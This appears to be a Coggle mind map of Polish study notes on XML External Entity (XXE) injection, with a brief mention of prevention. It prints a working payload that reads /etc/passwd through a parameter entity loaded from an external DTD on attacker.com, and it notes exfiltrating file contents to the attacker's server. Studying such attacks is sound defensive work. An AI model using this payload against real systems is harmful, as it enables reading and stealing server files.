Please enable JavaScript.

Coggle requires JavaScript to display documents.

XML (prewencja (wyłączyć rozwiązywanie zewn. encji, ograniczyć liczbę…

- - - - serwer w odpowiedzi przepisuje jedną z wartości tagów, np. nazwe ksiazki. Wystarczy na koncu tej wartosci dodac nasza encje ktora bedzie probowala podstawic wartosc jednego z plikow umieszczonych na serwerze.
    - - ten atak różni się od poprzedniego tym, że w atrybucie a raczej jego wartosci nie moze byc zewnętrznych encji, dodatkowo w encji param. nie może być innej encji param. ale jezeli encje param przeniesiemy do zewn. pliku i potem wywołamy w niej inna encje param to wszystko zadziala.
        <!DOCTYPE data [ <!ENTITY % file SYSTEM "/etc/passwd"> <!ENTITY % external SYSTEM "https://attacker.com/plik.xml"> %external; %x; ]> <data> <transaction id="123&s;"> </data>
        gdzie zawartość plik.xml to
        <!ENTITY % x '<!ENTITY s "%file;">'>
    - - ratuje nas wtedy wysłanie zawartości pliku na nasz serwer